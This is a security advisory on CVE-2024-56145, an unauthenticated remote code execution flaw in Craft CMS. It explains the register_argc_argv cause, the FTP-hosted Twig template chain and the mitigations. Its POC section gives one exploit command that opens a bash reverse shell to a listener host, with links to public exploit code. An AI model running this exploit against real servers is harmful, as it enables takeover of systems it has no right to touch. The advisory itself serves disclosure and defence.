Vulnerable Version
Versions >= 3.0.0 and < 3.9.14 Versions >= 4.0.0-RC1 and < 4.13.2 Versions >= 5.0.0-RC1 and < 5.5.2
Fixed Version
Patched versions 3.9.14, 4.13.2, or 5.5.2
Base Score
9.3 Critical
Vendor Description:-
Craft CMS (Content Management System) is a flexible and user-friendly platform for building and
managing websites. It is known for its developer-centric approach, providing powerful tools for
developers to create custom websites and applications while still being easy for content editors to use.
CVE-2024-56145 Vulnerability Description:-
Security experts at Assetnote discovered a severe vulnerability (CVE-2024-56145) in Craft CMS, a popular
PHP-based content management system. This issue, with a CVSS score of 9.3, allows unauthenticated
remote code execution (RCE) in some settings, posing a serious danger to vulnerable installations.
This vulnerability exploits the behavior of the register_argc_argv configuration in PHP. By default, this
setting allows query string arguments to populate the $_SERVER[‘argv’] array, mimicking command-line
input. While this behavior can be useful in certain scenarios, it inadvertently exposes the system to
attacks by allowing malicious actors to pass options via the web, options that were originally intended
for the command-line environment.
As noted by Assetnote, “Critically, the Craft CMS official Docker has register_argc_argv = On. This sets the
stage for our bug.”
The issue is located in the bootstrap/bootstrap.php file of Craft CMS, where command-line options are
processed without first checking if the code is being executed in a CLI context. This oversight allows
attackers to manipulate paths, such as –templatesPath or –configPath, forcing the CMS to load arbitrary
files.
Exploiting this vulnerability for Remote Code Execution (RCE) required bypassing Craft CMS’s defensive
mechanisms, such as file existence checks (file_exists), which block common file inclusion methods like
php://filter or HTTP wrappers. Researchers found that using the ftp:// wrapper bypasses these checks,
allowing the CMS to load template files from a malicious FTP server.
By hosting crafted Twig template files on a controlled FTP server, attackers injected executable payloads
into Craft CMS. One inventive method used the Twig sort filter to bypass Craft’s built-in sandboxing,
enabling the execution of system commands. An example payload to achieve this would be:
Impact and Potential Risks
- Remote Code Execution (RCE): Attackers can execute arbitrary code on the server, potentially
leading to unauthorized access and control over the system. - Data Breaches: Exploitation may result in unauthorized access to sensitive data, including user
information and proprietary content. - Operational Disruption: Successful attacks can disrupt website functionality, leading to
downtime and reputational damage.
Mitigation
Update Craft CMS: The recommended course of action is to update to the latest patched versions of
Craft CMS, specifically 3.9.14, 4.13.2, or 5.5.2. This update addresses the vulnerability and removes the
risk of exploitation due to the register_argc_argv configuration.
Disable register_argc_argv: If updating is not immediately possible, a temporary mitigation involves
disabling the register_argc_argv directive in the php.ini file. This can be achieved by setting
register_argc_argv = Off and restarting the web server to apply changes.
Those managing numerous Craft CMS deployments should conduct regular audits of the server’s PHP
settings to guarantee compliance with security best practices.
POC
Exploit link – Clickme
python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash
POC Video:-
References:-
https://securityonline.info/cve-2024-56145-remote-code-execution-vulnerability-in-craft-cms-poc-
published/
https://github.com/Sachinart/CVE-2024-56145-craftcms-rce
https://github.com/Chocapikk/CVE-2024-56145